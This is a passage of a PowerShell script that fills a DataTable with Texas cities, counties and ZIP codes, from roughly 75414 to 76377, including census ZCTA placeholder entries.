$Cities.Rows.Add("Bells","Grayson","Texas","TX","48","75414") + $null = $Cities.Rows.Add("Ben franklin","Delta","Texas","TX","48","75415") + $null = $Cities.Rows.Add("Blossom","Lamar","Texas","TX","48","75416") + $null = $Cities.Rows.Add("Bogata","Red River","Texas","TX","48","75417") + $null = $Cities.Rows.Add("Bonham","Fannin","Texas","TX","48","75418") + $null = $Cities.Rows.Add("Brashear","Hopkins","Texas","TX","48","75420") + $null = $Cities.Rows.Add("Brookston","Lamar","Texas","TX","48","75421") + $null = $Cities.Rows.Add("Campbell","Hunt","Texas","TX","48","75422") + $null = $Cities.Rows.Add("Celeste","Hunt","Texas","TX","48","75423") + $null = $Cities.Rows.Add("Blue ridge","Collin","Texas","TX","48","75424") + $null = $Cities.Rows.Add("Clarksville","Red River","Texas","TX","48","75426") + $null = $Cities.Rows.Add("Commerce","Hunt","Texas","TX","48","75428") + $null = $Cities.Rows.Add("Como","Hopkins","Texas","TX","48","75431") + $null = $Cities.Rows.Add("Cooper","Delta","Texas","TX","48","75432") + $null = $Cities.Rows.Add("Cumby","Hopkins","Texas","TX","48","75433") + $null = $Cities.Rows.Add("Cunningham","Lamar","Texas","TX","48","75434") + $null = $Cities.Rows.Add("Deport","Lamar","Texas","TX","48","75435") + $null = $Cities.Rows.Add("Detroit","Red River","Texas","TX","48","75436") + $null = $Cities.Rows.Add("Dike","Hopkins","Texas","TX","48","75437") + $null = $Cities.Rows.Add("Dodd city","Fannin","Texas","TX","48","75438") + $null = $Cities.Rows.Add("Ector","Fannin","Texas","TX","48","75439") + $null = $Cities.Rows.Add("Emory","Rains","Texas","TX","48","75440") + $null = $Cities.Rows.Add("Enloe","Delta","Texas","TX","48","75441") + $null = $Cities.Rows.Add("Farmersville","Collin","Texas","TX","48","75442") + $null = $Cities.Rows.Add("Golden","Wood","Texas","TX","48","75444") + $null = $Cities.Rows.Add("Honey grove","Fannin","Texas","TX","48","75446") + $null = $Cities.Rows.Add("Ivanhoe","Fannin","Texas","TX","48","75447") + $null = $Cities.Rows.Add("Klondike","Delta","Texas","TX","48","75448") + $null = $Cities.Rows.Add("Ladonia","Fannin","Texas","TX","48","75449") + $null = $Cities.Rows.Add("Lake creek","Delta","Texas","TX","48","75450") + $null = $Cities.Rows.Add("Leesburg","Camp","Texas","TX","48","75451") + $null = $Cities.Rows.Add("Leonard","Fannin","Texas","TX","48","75452") + $null = $Cities.Rows.Add("Lone oak","Hunt","Texas","TX","48","75453") + $null = $Cities.Rows.Add("Melissa","Collin","Texas","TX","48","75454") + $null = $Cities.Rows.Add("Mount pleasant","Titus","Texas","TX","48","75455") + $null = $Cities.Rows.Add("Mount vernon","Franklin","Texas","TX","48","75457") + $null = $Cities.Rows.Add("Howe","Grayson","Texas","TX","48","75459") + $null = $Cities.Rows.Add("Paris","Lamar","Texas","TX","48","75460") + $null = $Cities.Rows.Add("Reno","Lamar","Texas","TX","48","75462") + $null = $Cities.Rows.Add("Pattonville","Lamar","Texas","TX","48","75468") + $null = $Cities.Rows.Add("Pecan gap","Delta","Texas","TX","48","75469") + $null = $Cities.Rows.Add("Petty","Lamar","Texas","TX","48","75470") + $null = $Cities.Rows.Add("Pickton","Hopkins","Texas","TX","48","75471") + $null = $Cities.Rows.Add("Point","Rains","Texas","TX","48","75472") + $null = $Cities.Rows.Add("Powderly","Lamar","Texas","TX","48","75473") + $null = $Cities.Rows.Add("Quinlan","Hunt","Texas","TX","48","75474") + $null = $Cities.Rows.Add("Randolph","Fannin","Texas","TX","48","75475") + $null = $Cities.Rows.Add("Ravenna","Fannin","Texas","TX","48","75476") + $null = $Cities.Rows.Add("Roxton","Lamar","Texas","TX","48","75477") + $null = $Cities.Rows.Add("Saltillo","Hopkins","Texas","TX","48","75478") + $null = $Cities.Rows.Add("Savoy","Fannin","Texas","TX","48","75479") + $null = $Cities.Rows.Add("Scroggins","Franklin","Texas","TX","48","75480") + $null = $Cities.Rows.Add("Sulphur bluff","Hopkins","Texas","TX","48","75481") + $null = $Cities.Rows.Add("Sulphur springs","Hopkins","Texas","TX","48","75482") + $null = $Cities.Rows.Add("Westminster","Collin","Texas","TX","48","75485") + $null = $Cities.Rows.Add("Sumner","Lamar","Texas","TX","48","75486") + $null = $Cities.Rows.Add("Talco","Titus","Texas","TX","48","75487") + $null = $Cities.Rows.Add("Telephone","Fannin","Texas","TX","48","75488") + $null = $Cities.Rows.Add("Tom bean","Grayson","Texas","TX","48","75489") + $null = $Cities.Rows.Add("Trenton","Fannin","Texas","TX","48","75490") + $null = $Cities.Rows.Add("Whitewright","Grayson","Texas","TX","48","75491") + $null = $Cities.Rows.Add("Windom","Fannin","Texas","TX","48","75492") + $null = $Cities.Rows.Add("Winfield","Titus","Texas","TX","48","75493") + $null = $Cities.Rows.Add("Winnsboro","Wood","Texas","TX","48","75494") + $null = $Cities.Rows.Add("Van alstyne","Grayson","Texas","TX","48","75495") + $null = $Cities.Rows.Add("Wolfe city","Hunt","Texas","TX","48","75496") + $null = $Cities.Rows.Add("Yantis","Wood","Texas","TX","48","75497") + $null = $Cities.Rows.Add("Zcta 754hh","Camp","Texas","TX","48","754HH") + $null = $Cities.Rows.Add("Wake village","Bowie","Texas","TX","48","75501") + $null = $Cities.Rows.Add("Texarkana","Bowie","Texas","TX","48","75503") + $null = $Cities.Rows.Add("Annona","Red River","Texas","TX","48","75550") + $null = $Cities.Rows.Add("Atlanta","Cass","Texas","TX","48","75551") + $null = $Cities.Rows.Add("Avery","Red River","Texas","TX","48","75554") + $null = $Cities.Rows.Add("Bivins","Cass","Texas","TX","48","75555") + $null = $Cities.Rows.Add("Bloomburg","Cass","Texas","TX","48","75556") + $null = $Cities.Rows.Add("Cookville","Titus","Texas","TX","48","75558") + $null = $Cities.Rows.Add("De kalb","Bowie","Texas","TX","48","75559") + $null = $Cities.Rows.Add("Douglassville","Cass","Texas","TX","48","75560") + $null = $Cities.Rows.Add("Leary","Bowie","Texas","TX","48","75561") + $null = $Cities.Rows.Add("Kildare","Cass","Texas","TX","48","75562") + $null = $Cities.Rows.Add("Linden","Cass","Texas","TX","48","75563") + $null = $Cities.Rows.Add("Lodi","Marion","Texas","TX","48","75564") + $null = $Cities.Rows.Add("Mc leod","Cass","Texas","TX","48","75565") + $null = $Cities.Rows.Add("Marietta","Cass","Texas","TX","48","75566") + $null = $Cities.Rows.Add("Maud","Bowie","Texas","TX","48","75567") + $null = $Cities.Rows.Add("Naples","Morris","Texas","TX","48","75568") + $null = $Cities.Rows.Add("Nash","Bowie","Texas","TX","48","75569") + $null = $Cities.Rows.Add("Boston","Bowie","Texas","TX","48","75570") + $null = $Cities.Rows.Add("Omaha","Morris","Texas","TX","48","75571") + $null = $Cities.Rows.Add("Queen city","Cass","Texas","TX","48","75572") + $null = $Cities.Rows.Add("Redwater","Bowie","Texas","TX","48","75573") + $null = $Cities.Rows.Add("Simms","Bowie","Texas","TX","48","75574") + $null = $Cities.Rows.Add("Zcta 755hh","Bowie","Texas","TX","48","755HH") + $null = $Cities.Rows.Add("Zcta 755xx","Bowie","Texas","TX","48","755XX") + $null = $Cities.Rows.Add("Longview","Gregg","Texas","TX","48","75601") + $null = $Cities.Rows.Add("Longview","Gregg","Texas","TX","48","75602") + $null = $Cities.Rows.Add("Longview","Gregg","Texas","TX","48","75603") + $null = $Cities.Rows.Add("Longview","Gregg","Texas","TX","48","75604") + $null = $Cities.Rows.Add("Longview","Gregg","Texas","TX","48","75605") + $null = $Cities.Rows.Add("Avinger","Marion","Texas","TX","48","75630") + $null = $Cities.Rows.Add("Beckville","Panola","Texas","TX","48","75631") + $null = $Cities.Rows.Add("Carthage","Panola","Texas","TX","48","75633") + $null = $Cities.Rows.Add("Cason","Morris","Texas","TX","48","75636") + $null = $Cities.Rows.Add("Daingerfield","Morris","Texas","TX","48","75638") + $null = $Cities.Rows.Add("De berry","Panola","Texas","TX","48","75639") + $null = $Cities.Rows.Add("New diana","Upshur","Texas","TX","48","75640") + $null = $Cities.Rows.Add("Easton","Gregg","Texas","TX","48","75641") + $null = $Cities.Rows.Add("Gary","Panola","Texas","TX","48","75643") + $null = $Cities.Rows.Add("Gilmer","Upshur","Texas","TX","48","75644") + $null = $Cities.Rows.Add("Gladewater","Gregg","Texas","TX","48","75647") + $null = $Cities.Rows.Add("Hallsville","Harrison","Texas","TX","48","75650") + $null = $Cities.Rows.Add("Harleton","Harrison","Texas","TX","48","75651") + $null = $Cities.Rows.Add("Henderson","Rusk","Texas","TX","48","75652") + $null = $Cities.Rows.Add("Zcta 75654","Rusk","Texas","TX","48","75654") + $null = $Cities.Rows.Add("Hughes springs","Cass","Texas","TX","48","75656") + $null = $Cities.Rows.Add("Smithland","Marion","Texas","TX","48","75657") + $null = $Cities.Rows.Add("Karnack","Harrison","Texas","TX","48","75661") + $null = $Cities.Rows.Add("Kilgore","Gregg","Texas","TX","48","75662") + $null = $Cities.Rows.Add("Laneville","Rusk","Texas","TX","48","75667") + $null = $Cities.Rows.Add("Lone star","Morris","Texas","TX","48","75668") + $null = $Cities.Rows.Add("Long branch","Panola","Texas","TX","48","75669") + $null = $Cities.Rows.Add("Marshall","Harrison","Texas","TX","48","75670") + $null = $Cities.Rows.Add("Zcta 75672","Harrison","Texas","TX","48","75672") + $null = $Cities.Rows.Add("Minden","Rusk","Texas","TX","48","75680") + $null = $Cities.Rows.Add("Mount enterprise","Rusk","Texas","TX","48","75681") + $null = $Cities.Rows.Add("Ore city","Upshur","Texas","TX","48","75683") + $null = $Cities.Rows.Add("Overton","Rusk","Texas","TX","48","75684") + $null = $Cities.Rows.Add("Pittsburg","Camp","Texas","TX","48","75686") + $null = $Cities.Rows.Add("Tatum","Rusk","Texas","TX","48","75691") + $null = $Cities.Rows.Add("Waskom","Harrison","Texas","TX","48","75692") + $null = $Cities.Rows.Add("Clarksville city","Gregg","Texas","TX","48","75693") + $null = $Cities.Rows.Add("Zcta 756hh","Camp","Texas","TX","48","756HH") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75701") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75702") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75703") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75704") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75705") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75706") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75707") + $null = $Cities.Rows.Add("East texas cente","Smith","Texas","TX","48","75708") + $null = $Cities.Rows.Add("Tyler","Smith","Texas","TX","48","75709") + $null = $Cities.Rows.Add("Arp","Smith","Texas","TX","48","75750") + $null = $Cities.Rows.Add("Athens","Henderson","Texas","TX","48","75751") + $null = $Cities.Rows.Add("Ben wheeler","Van Zandt","Texas","TX","48","75754") + $null = $Cities.Rows.Add("Big sandy","Upshur","Texas","TX","48","75755") + $null = $Cities.Rows.Add("Edom","Henderson","Texas","TX","48","75756") + $null = $Cities.Rows.Add("Mount selman","Smith","Texas","TX","48","75757") + $null = $Cities.Rows.Add("Chandler","Henderson","Texas","TX","48","75758") + $null = $Cities.Rows.Add("Cuney","Cherokee","Texas","TX","48","75759") + $null = $Cities.Rows.Add("Cushing","Nacogdoches","Texas","TX","48","75760") + $null = $Cities.Rows.Add("Flint","Smith","Texas","TX","48","75762") + $null = $Cities.Rows.Add("Frankston","Anderson","Texas","TX","48","75763") + $null = $Cities.Rows.Add("Gallatin","Cherokee","Texas","TX","48","75764") + $null = $Cities.Rows.Add("Hawkins","Wood","Texas","TX","48","75765") + $null = $Cities.Rows.Add("Jacksonville","Cherokee","Texas","TX","48","75766") + $null = $Cities.Rows.Add("Larue","Henderson","Texas","TX","48","75770") + $null = $Cities.Rows.Add("Mt sylvan","Smith","Texas","TX","48","75771") + $null = $Cities.Rows.Add("Mineola","Wood","Texas","TX","48","75773") + $null = $Cities.Rows.Add("Murchison","Henderson","Texas","TX","48","75778") + $null = $Cities.Rows.Add("Poynor","Henderson","Texas","TX","48","75782") + $null = $Cities.Rows.Add("Quitman","Wood","Texas","TX","48","75783") + $null = $Cities.Rows.Add("Reklaw","Rusk","Texas","TX","48","75784") + $null = $Cities.Rows.Add("Dialville","Cherokee","Texas","TX","48","75785") + $null = $Cities.Rows.Add("Sacul","Nacogdoches","Texas","TX","48","75788") + $null = $Cities.Rows.Add("Troup","Smith","Texas","TX","48","75789") + $null = $Cities.Rows.Add("Van","Van Zandt","Texas","TX","48","75790") + $null = $Cities.Rows.Add("Whitehouse","Smith","Texas","TX","48","75791") + $null = $Cities.Rows.Add("Winona","Smith","Texas","TX","48","75792") + $null = $Cities.Rows.Add("Zcta 757hh","Cherokee","Texas","TX","48","757HH") + $null = $Cities.Rows.Add("Palestine","Anderson","Texas","TX","48","75801") + $null = $Cities.Rows.Add("Freestone","Leon","Texas","TX","48","75831") + $null = $Cities.Rows.Add("Centerville","Leon","Texas","TX","48","75833") + $null = $Cities.Rows.Add("Austonio","Houston","Texas","TX","48","75835") + $null = $Cities.Rows.Add("Donie","Freestone","Texas","TX","48","75838") + $null = $Cities.Rows.Add("Slocum","Anderson","Texas","TX","48","75839") + $null = $Cities.Rows.Add("Fairfield","Freestone","Texas","TX","48","75840") + $null = $Cities.Rows.Add("Grapeland","Houston","Texas","TX","48","75844") + $null = $Cities.Rows.Add("Groveton","Trinity","Texas","TX","48","75845") + $null = $Cities.Rows.Add("Jewett","Leon","Texas","TX","48","75846") + $null = $Cities.Rows.Add("Kennard","Houston","Texas","TX","48","75847") + $null = $Cities.Rows.Add("Kirvin","Freestone","Texas","TX","48","75848") + $null = $Cities.Rows.Add("Latexo","Houston","Texas","TX","48","75849") + $null = $Cities.Rows.Add("Leona","Leon","Texas","TX","48","75850") + $null = $Cities.Rows.Add("Lovelady","Houston","Texas","TX","48","75851") + $null = $Cities.Rows.Add("Midway","Madison","Texas","TX","48","75852") + $null = $Cities.Rows.Add("Montalba","Anderson","Texas","TX","48","75853") + $null = $Cities.Rows.Add("Oakwood","Leon","Texas","TX","48","75855") + $null = $Cities.Rows.Add("Pennington","Trinity","Texas","TX","48","75856") + $null = $Cities.Rows.Add("Ratcliff","Houston","Texas","TX","48","75858") + $null = $Cities.Rows.Add("Streetman","Freestone","Texas","TX","48","75859") + $null = $Cities.Rows.Add("Teague","Freestone","Texas","TX","48","75860") + $null = $Cities.Rows.Add("Tennessee colony","Anderson","Texas","TX","48","75861") + $null = $Cities.Rows.Add("Trinity","Trinity","Texas","TX","48","75862") + $null = $Cities.Rows.Add("Zcta 758hh","Freestone","Texas","TX","48","758HH") + $null = $Cities.Rows.Add("Keltys","Angelina","Texas","TX","48","75901") + $null = $Cities.Rows.Add("Lufkin","Angelina","Texas","TX","48","75904") + $null = $Cities.Rows.Add("Forest","Cherokee","Texas","TX","48","75925") + $null = $Cities.Rows.Add("Apple springs","Trinity","Texas","TX","48","75926") + $null = $Cities.Rows.Add("Bon wier","Newton","Texas","TX","48","75928") + $null = $Cities.Rows.Add("Broaddus","San Augustine","Texas","TX","48","75929") + $null = $Cities.Rows.Add("Bronson","Sabine","Texas","TX","48","75930") + $null = $Cities.Rows.Add("Brookeland","Jasper","Texas","TX","48","75931") + $null = $Cities.Rows.Add("Burkeville","Newton","Texas","TX","48","75932") + $null = $Cities.Rows.Add("Call","Newton","Texas","TX","48","75933") + $null = $Cities.Rows.Add("Camden","Polk","Texas","TX","48","75934") + $null = $Cities.Rows.Add("Center","Shelby","Texas","TX","48","75935") + $null = $Cities.Rows.Add("Chester","Tyler","Texas","TX","48","75936") + $null = $Cities.Rows.Add("Chireno","Nacogdoches","Texas","TX","48","75937") + $null = $Cities.Rows.Add("Rockland","Tyler","Texas","TX","48","75938") + $null = $Cities.Rows.Add("Barnum","Polk","Texas","TX","48","75939") + $null = $Cities.Rows.Add("Diboll","Angelina","Texas","TX","48","75941") + $null = $Cities.Rows.Add("Doucette","Tyler","Texas","TX","48","75942") + $null = $Cities.Rows.Add("Douglass","Nacogdoches","Texas","TX","48","75943") + $null = $Cities.Rows.Add("Etoile","Nacogdoches","Texas","TX","48","75944") + $null = $Cities.Rows.Add("Garrison","Nacogdoches","Texas","TX","48","75946") + $null = $Cities.Rows.Add("Hemphill","Sabine","Texas","TX","48","75948") + $null = $Cities.Rows.Add("Huntington","Angelina","Texas","TX","48","75949") + $null = $Cities.Rows.Add("Sam rayburn","Jasper","Texas","TX","48","75951") + $null = $Cities.Rows.Add("Joaquin","Shelby","Texas","TX","48","75954") + $null = $Cities.Rows.Add("Bon ami","Jasper","Texas","TX","48","75956") + $null = $Cities.Rows.Add("Milam","Sabine","Texas","TX","48","75959") + $null = $Cities.Rows.Add("Moscow","Polk","Texas","TX","48","75960") + $null = $Cities.Rows.Add("Appleby","Nacogdoches","Texas","TX","48","75961") + $null = $Cities.Rows.Add("Nacogdoches","Nacogdoches","Texas","TX","48","75964") + $null = $Cities.Rows.Add("Newton","Newton","Texas","TX","48","75966") + $null = $Cities.Rows.Add("Pineland","Sabine","Texas","TX","48","75968") + $null = $Cities.Rows.Add("Pollok","Angelina","Texas","TX","48","75969") + $null = $Cities.Rows.Add("San augustine","San Augustine","Texas","TX","48","75972") + $null = $Cities.Rows.Add("Shelbyville","Shelby","Texas","TX","48","75973") + $null = $Cities.Rows.Add("Tenaha","Shelby","Texas","TX","48","75974") + $null = $Cities.Rows.Add("Timpson","Shelby","Texas","TX","48","75975") + $null = $Cities.Rows.Add("Wells","Cherokee","Texas","TX","48","75976") + $null = $Cities.Rows.Add("Wiergate","Newton","Texas","TX","48","75977") + $null = $Cities.Rows.Add("Woden","Nacogdoches","Texas","TX","48","75978") + $null = $Cities.Rows.Add("Dogwood","Tyler","Texas","TX","48","75979") + $null = $Cities.Rows.Add("Zavalla","Angelina","Texas","TX","48","75980") + $null = $Cities.Rows.Add("Zcta 759hh","Angelina","Texas","TX","48","759HH") + $null = $Cities.Rows.Add("Zcta 759xx","Polk","Texas","TX","48","759XX") + $null = $Cities.Rows.Add("Zcta 76001","Tarrant","Texas","TX","48","76001") + $null = $Cities.Rows.Add("Zcta 76002","Tarrant","Texas","TX","48","76002") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76006") + $null = $Cities.Rows.Add("Aledo","Parker","Texas","TX","48","76008") + $null = $Cities.Rows.Add("Alvarado","Johnson","Texas","TX","48","76009") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76010") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76011") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76012") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76013") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76014") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76015") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76016") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76017") + $null = $Cities.Rows.Add("Arlington","Tarrant","Texas","TX","48","76018") + $null = $Cities.Rows.Add("Azle","Tarrant","Texas","TX","48","76020") + $null = $Cities.Rows.Add("Bedford","Tarrant","Texas","TX","48","76021") + $null = $Cities.Rows.Add("Bedford","Tarrant","Texas","TX","48","76022") + $null = $Cities.Rows.Add("Boyd","Wise","Texas","TX","48","76023") + $null = $Cities.Rows.Add("Burleson","Johnson","Texas","TX","48","76028") + $null = $Cities.Rows.Add("Cleburne","Johnson","Texas","TX","48","76031") + $null = $Cities.Rows.Add("Colleyville","Tarrant","Texas","TX","48","76034") + $null = $Cities.Rows.Add("Cresson","Hood","Texas","TX","48","76035") + $null = $Cities.Rows.Add("Crowley","Tarrant","Texas","TX","48","76036") + $null = $Cities.Rows.Add("Euless","Tarrant","Texas","TX","48","76039") + $null = $Cities.Rows.Add("Euless","Tarrant","Texas","TX","48","76040") + $null = $Cities.Rows.Add("Forreston","Ellis","Texas","TX","48","76041") + $null = $Cities.Rows.Add("Glen rose","Somervell","Texas","TX","48","76043") + $null = $Cities.Rows.Add("Godley","Johnson","Texas","TX","48","76044") + $null = $Cities.Rows.Add("Granbury","Hood","Texas","TX","48","76048") + $null = $Cities.Rows.Add("Granbury","Hood","Texas","TX","48","76049") + $null = $Cities.Rows.Add("Grandview","Johnson","Texas","TX","48","76050") + $null = $Cities.Rows.Add("Grapevine","Tarrant","Texas","TX","48","76051") + $null = $Cities.Rows.Add("Haslet","Tarrant","Texas","TX","48","76052") + $null = $Cities.Rows.Add("Hurst","Tarrant","Texas","TX","48","76053") + $null = $Cities.Rows.Add("Hurst","Tarrant","Texas","TX","48","76054") + $null = $Cities.Rows.Add("Itasca","Hill","Texas","TX","48","76055") + $null = $Cities.Rows.Add("Joshua","Johnson","Texas","TX","48","76058") + $null = $Cities.Rows.Add("Keene","Johnson","Texas","TX","48","76059") + $null = $Cities.Rows.Add("Kennedale","Tarrant","Texas","TX","48","76060") + $null = $Cities.Rows.Add("Lillian","Johnson","Texas","TX","48","76061") + $null = $Cities.Rows.Add("Mansfield","Tarrant","Texas","TX","48","76063") + $null = $Cities.Rows.Add("Maypearl","Ellis","Texas","TX","48","76064") + $null = $Cities.Rows.Add("Midlothian","Ellis","Texas","TX","48","76065") + $null = $Cities.Rows.Add("Millsap","Parker","Texas","TX","48","76066") + $null = $Cities.Rows.Add("Mineral wells","Palo Pinto","Texas","TX","48","76067") + $null = $Cities.Rows.Add("Nemo","Somervell","Texas","TX","48","76070") + $null = $Cities.Rows.Add("Newark","Wise","Texas","TX","48","76071") + $null = $Cities.Rows.Add("Paradise","Wise","Texas","TX","48","76073") + $null = $Cities.Rows.Add("Rainbow","Somervell","Texas","TX","48","76077") + $null = $Cities.Rows.Add("Rhome","Wise","Texas","TX","48","76078") + $null = $Cities.Rows.Add("Springtown","Parker","Texas","TX","48","76082") + $null = $Cities.Rows.Add("Venus","Johnson","Texas","TX","48","76084") + $null = $Cities.Rows.Add("Weatherford","Parker","Texas","TX","48","76086") + $null = $Cities.Rows.Add("Weatherford","Parker","Texas","TX","48","76087") + $null = $Cities.Rows.Add("Zcta 76088","Parker","Texas","TX","48","76088") + $null = $Cities.Rows.Add("Grapevine","Tarrant","Texas","TX","48","76092") + $null = $Cities.Rows.Add("Rio vista","Johnson","Texas","TX","48","76093") + $null = $Cities.Rows.Add("Zcta 760hh","Hood","Texas","TX","48","760HH") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76102") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76103") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76104") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76105") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76106") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76107") + $null = $Cities.Rows.Add("White settlement","Tarrant","Texas","TX","48","76108") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76109") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76110") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76111") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76112") + $null = $Cities.Rows.Add("River oaks","Tarrant","Texas","TX","48","76114") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76115") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76116") + $null = $Cities.Rows.Add("Haltom city","Tarrant","Texas","TX","48","76117") + $null = $Cities.Rows.Add("North richland h","Tarrant","Texas","TX","48","76118") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76119") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76120") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76123") + $null = $Cities.Rows.Add("Benbrook","Tarrant","Texas","TX","48","76126") + $null = $Cities.Rows.Add("Carswell afb","Tarrant","Texas","TX","48","76127") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76131") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76132") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76133") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76134") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76135") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76137") + $null = $Cities.Rows.Add("Everman","Tarrant","Texas","TX","48","76140") + $null = $Cities.Rows.Add("Watauga","Tarrant","Texas","TX","48","76148") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76155") + $null = $Cities.Rows.Add("Fort worth","Tarrant","Texas","TX","48","76177") + $null = $Cities.Rows.Add("Saginaw","Tarrant","Texas","TX","48","76179") + $null = $Cities.Rows.Add("North richland h","Tarrant","Texas","TX","48","76180") + $null = $Cities.Rows.Add("Zcta 761hh","Tarrant","Texas","TX","48","761HH") + $null = $Cities.Rows.Add("Denton","Denton","Texas","TX","48","76201") + $null = $Cities.Rows.Add("Denton","Denton","Texas","TX","48","76205") + $null = $Cities.Rows.Add("Denton","Denton","Texas","TX","48","76207") + $null = $Cities.Rows.Add("Denton","Denton","Texas","TX","48","76208") + $null = $Cities.Rows.Add("Alvord","Wise","Texas","TX","48","76225") + $null = $Cities.Rows.Add("Argyle","Denton","Texas","TX","48","76226") + $null = $Cities.Rows.Add("Aubrey","Denton","Texas","TX","48","76227") + $null = $Cities.Rows.Add("Bellevue","Clay","Texas","TX","48","76228") + $null = $Cities.Rows.Add("Bowie","Montague","Texas","TX","48","76230") + $null = $Cities.Rows.Add("Collinsville","Grayson","Texas","TX","48","76233") + $null = $Cities.Rows.Add("Decatur","Wise","Texas","TX","48","76234") + $null = $Cities.Rows.Add("Era","Cooke","Texas","TX","48","76238") + $null = $Cities.Rows.Add("Forestburg","Montague","Texas","TX","48","76239") + $null = $Cities.Rows.Add("Lake kiowa","Cooke","Texas","TX","48","76240") + $null = $Cities.Rows.Add("Gordonville","Grayson","Texas","TX","48","76245") + $null = $Cities.Rows.Add("Greenwood","Wise","Texas","TX","48","76246") + $null = $Cities.Rows.Add("Justin","Denton","Texas","TX","48","76247") + $null = $Cities.Rows.Add("Keller","Tarrant","Texas","TX","48","76248") + $null = $Cities.Rows.Add("Krum","Denton","Texas","TX","48","76249") + $null = $Cities.Rows.Add("Lindsay","Cooke","Texas","TX","48","76250") + $null = $Cities.Rows.Add("Montague","Montague","Texas","TX","48","76251") + $null = $Cities.Rows.Add("Muenster","Cooke","Texas","TX","48","76252") + $null = $Cities.Rows.Add("Myra","Cooke","Texas","TX","48","76253") + $null = $Cities.Rows.Add("Nocona","Montague","Texas","TX","48","76255") + $null = $Cities.Rows.Add("Pilot point","Denton","Texas","TX","48","76258") + $null = $Cities.Rows.Add("Ponder","Denton","Texas","TX","48","76259") + $null = $Cities.Rows.Add("Ringgold","Montague","Texas","TX","48","76261") + $null = $Cities.Rows.Add("Trophy club","Denton","Texas","TX","48","76262") + $null = $Cities.Rows.Add("Sadler","Grayson","Texas","TX","48","76264") + $null = $Cities.Rows.Add("Saint jo","Montague","Texas","TX","48","76265") + $null = $Cities.Rows.Add("Sanger","Denton","Texas","TX","48","76266") + $null = $Cities.Rows.Add("Southmayd","Grayson","Texas","TX","48","76268") + $null = $Cities.Rows.Add("Sunset","Montague","Texas","TX","48","76270") + $null = $Cities.Rows.Add("Tioga","Grayson","Texas","TX","48","76271") + $null = $Cities.Rows.Add("Valley view","Cooke","Texas","TX","48","76272") + $null = $Cities.Rows.Add("Whitesboro","Grayson","Texas","TX","48","76273") + $null = $Cities.Rows.Add("Zcta 762hh","Cooke","Texas","TX","48","762HH") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76301") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76302") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76305") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76306") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76308") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76309") + $null = $Cities.Rows.Add("Wichita falls","Wichita","Texas","TX","48","76310") + $null = $Cities.Rows.Add("Sheppard afb","Wichita","Texas","TX","48","76311") + $null = $Cities.Rows.Add("Archer city","Archer","Texas","TX","48","76351") + $null = $Cities.Rows.Add("Burkburnett","Wichita","Texas","TX","48","76354") + $null = $Cities.Rows.Add("Byers","Clay","Texas","TX","48","76357") + $null = $Cities.Rows.Add("Electra","Wichita","Texas","TX","48","76360") + $null = $Cities.Rows.Add("Goree","Knox","Texas","TX","48","76363") + $null = $Cities.Rows.Add("Harrold","Wilbarger","Texas","TX","48","76364") + $null = $Cities.Rows.Add("Henrietta","Clay","Texas","TX","48","76365") + $null = $Cities.Rows.Add("Holliday","Archer","Texas","TX","48","76366") + $null = $Cities.Rows.Add("Iowa park","Wichita","Texas","TX","48","76367") + $null = $Cities.Rows.Add("Megargel","Archer","Texas","TX","48","76370") + $null = $Cities.Rows.Add("Munday","Knox","Texas","TX","48","76371") + $null = $Cities.Rows.Add("Newcastle","Young","Texas","TX","48","76372") + $null = $Cities.Rows.Add("Oklaunion","Wilbarger","Texas","TX","48","76373") + $null = $Cities.Rows.Add("Olney","Young","Texas","TX","48","76374") + $null = $Cities.Rows.Add("Petrolia","Clay","Texas","TX","48","76377") + $null = 